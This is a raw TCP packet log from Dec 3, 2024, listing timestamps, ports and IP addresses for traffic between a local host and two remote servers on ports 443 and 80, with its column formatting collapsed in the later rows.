Dec 3, 2024 14:01:38.492132902 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.492141008 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.492151976 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.492260933 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.522100925 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.522125006 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.522198915 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.522207975 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.522245884 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.545701981 CET    49177        80         192.168.2.22    142.93.65.161
Dec 3, 2024 14:01:38.652167082 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.652210951 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.652342081 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.652342081 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.652342081 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.652358055 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.659133911 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.659147978 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.659176111 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.659185886 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.659194946 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.659209013 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.659214020 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.659229040 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.659251928 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.667603970 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.667615891 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.667638063 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.667659044 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.667669058 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.667680025 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.667689085 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.667721987 CET    80           49177      142.93.65.161   192.168.2.22
Dec 3, 2024 14:01:38.667773962 CET    49177        80         192.168.2.22    142.93.65.161
Dec 3, 2024 14:01:38.667897940 CET    49177        80         192.168.2.22    142.93.65.161
Dec 3, 2024 14:01:38.673161030 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.673198938 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.673213005 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.673223972 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.673233986 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.673274040 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.675544977 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.675592899 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.675601006 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.675621986 CET    443          49176      151.101.65.137  192.168.2.22
Dec 3, 2024 14:01:38.675656080 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.676246881 CET    49176        443        192.168.2.22    151.101.65.137
Dec 3, 2024 14:01:38.789268017 CET    80           49177      142.93.65.161   192.168.2.22
Dec 3, 2024 14:01:39.948823929 CET    80           49177      142.93.65.161   192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948841095 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948860884 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948872089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948882103 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948885918 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948894024 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948906898 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948906898 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948919058 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948929071 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948930025 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.948961020 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:39.949811935 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:39.949851036 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.130892038 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.130908012 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.131180048 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.133573055 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.134047031 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.134103060 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.138442039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.138905048 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.138962984 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.145620108 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.145642042 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.145703077 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.152753115 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.152769089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.152832031 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.157792091 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.157807112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.157870054 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.162501097 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.162514925 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.162564039 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.170135975 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.170150995 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.170193911 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.177776098 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.177789927 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.177828074 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.182559967 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.182573080 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.182632923 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.264885902 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.264909029 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.265101910 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.270248890 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.270262003 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.270306110 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.281965017 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.281976938 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.282018900 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.291235924 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.295367956 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.295380116 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.295517921 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.301769972 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.301781893 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.301830053 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.308583021 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.310746908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.310795069 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.310856104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.315829039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.315840006 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.315901995 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.318974018 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.319811106 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.319860935 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.324296951 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.324310064 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.324358940 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.329401016 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.329554081 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.329602003 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.337968111 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.338020086 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.338067055 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.346489906 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.346503019 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.346548080 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.355103016 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.355117083 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.355165958 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.363559008 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.363571882 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.363615036 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.372009039 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.372065067 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.372116089 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.385174990 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.385576963 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.385723114 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.388542891 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.388724089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.388771057 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.395092964 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.395104885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.395139933 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.400785923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.400801897 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.400949955 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.406960011 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.406972885 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.407010078 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.412698984 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.486006975 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.486021042 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.486128092 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.488697052 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.488708973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.488770962 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.737881899 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.737890005 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.737970114 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.739589930 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.739599943 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.739676952 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.741370916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.741379976 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.741456032 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.742746115 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.743071079 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.743184090 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.744431973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.744535923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.744663000 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.746016026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.746047974 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.746260881 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.816751957 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.816761971 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.816984892 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.817718029 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.817740917 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.817791939 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.821480036 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.821484089 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.821567059 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.824304104 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.824311018 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.824366093 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.825223923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.827967882 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.827975988 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.828027964 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.829138994 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.829145908 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.829196930 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.830346107 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.830353022 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.830410957 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.832079887 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.832135916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.832207918 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.834214926 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.834223032 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.834295988 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.835016012 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.835021973 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.835098028 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.836694002 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.836700916 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.836781979 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.838326931 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.838388920 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.838458061 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.840312958 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.840428114 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.840502024 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.842147112 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.842154026 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.842246056 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.843442917 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.844099045 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.844181061 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.844990969 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.845438004 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.845527887 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.846425056 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.846513033 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.846580982 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.848184109 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.848278999 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.848347902 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.849698067 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.849813938 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.849891901 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.851265907 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.851372004 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.851444960 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.853005886 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.853019953 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.853085995 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.854576111 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.854644060 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.854712963 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.856245041 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.856251955 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.856329918 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.857898951 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.858067989 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.858129025 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.859304905 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.859458923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.859525919 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.860831976 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.906891108 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.906963110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.906989098 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.907690048 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.907767057 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.907936096 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.909313917 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.909351110 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.909377098 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.910990953 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.911075115 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.911087990 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.912580013 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.912635088 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.913058996 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.914197922 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:40.914251089 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:40.914268017 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.118951082 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.119293928 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.119702101 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.119756937 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120383978 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120538950 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120544910 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.120589972 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.121445894 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.121695042 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.121764898 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122309923 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122642040 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122714043 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.122977972 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.123100996 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.123147964 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.123826981 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124249935 CET8049177142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124300003 CET4917780192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:41.124823093 CET8049177142.93.65.161192.168.2.22
